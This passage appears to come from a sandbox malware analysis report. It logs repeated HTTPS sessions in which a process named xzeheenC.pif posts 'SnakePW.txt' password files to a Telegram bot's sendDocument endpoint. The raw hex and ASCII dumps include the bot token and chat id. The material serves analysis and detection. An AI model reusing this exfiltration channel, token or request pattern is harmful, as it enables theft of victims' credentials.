                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:20 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418930,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      62192.168.2.549999149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21d05113ef78
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 64 30 35 31 31 33 65 66 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21d05113ef78Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:20 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:19 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:20 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418931,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      63192.168.2.550004149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21cf699ce188
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 63 66 36 39 39 63 65 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21cf699ce188Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:21 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:21 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418934,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      64192.168.2.550005149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23627ca5d7a5
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 36 32 37 63 61 35 64 37 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd23627ca5d7a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:22 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:21 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:22 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418936,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      65192.168.2.550007149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21f3fd82474b
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 66 33 66 64 38 32 34 37 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21f3fd82474bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:22 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:21 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:22 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418937,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      66192.168.2.550014149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd221a131b77fa
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 31 61 31 33 31 62 37 37 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd221a131b77faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:24 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:23 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:24 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418940,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      67192.168.2.550013149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23a7e0c358b1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 61 37 65 30 63 33 35 38 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd23a7e0c358b1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:24 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:24 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 517
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:24 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418943,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      68192.168.2.550012149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21f715d5f928
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 66 37 31 35 64 35 66 39 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21f715d5f928Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:24 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:23 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
